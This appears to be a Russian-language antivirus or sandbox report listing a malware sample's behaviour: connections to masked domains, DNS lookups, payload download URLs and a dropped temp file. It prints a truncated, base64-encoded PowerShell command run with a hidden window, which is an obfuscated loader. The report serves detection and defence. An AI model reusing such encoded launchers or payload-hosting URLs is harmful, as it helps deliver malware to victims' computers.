Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0ASQBUAGUATQAgACAAdgBBAFIAaQBBAEIAbABlADoAcwBQAHoAZQBqACAAIAAoAFsAVABZAHAAZQBdACgAJwBTAHkAUwBUAGUAbQAnACsAJwAuAEkATwAnACsAJwAuAEQAaQBSACcAKwAnAEUAQwB0AE8Acg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1992
- %TEMP%\1258818.cvr
- 'te###ama.com':80
- 'te###ama.com':443
- 'go#####imepattaya.com':80
- 'he##.hizuko.com':443
- 'su##i.net':443
- 'ma####centsinc.com':443
- http://te###ama.com/wp-admin/w0/
- http://go#####imepattaya.com/123-smart/TB/
- 'te###ama.com':443
- 'he##.hizuko.com':443
- 'su##i.net':443
- 'ma####centsinc.com':443
- DNS ASK te###ama.com
- DNS ASK go#####imepattaya.com
- DNS ASK he##.hizuko.com
- DNS ASK su##i.net
- DNS ASK fa####beaute.com
- DNS ASK ma####centsinc.com
- DNS ASK sa####telpro.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0ASQBUAGUATQAgACAAdgBBAFIAaQBBAEIAbABlADoAcwBQAHoAZQBqACAAIAAoAFsAVABZAHAAZQBdACgAJwBTAHkAUwBUAGUAbQAnACsAJwAuAEkATwAnACsAJwAuAEQAaQBSACcAKwAnAEUAQwB0AE8Acg...' (со скрытым окном)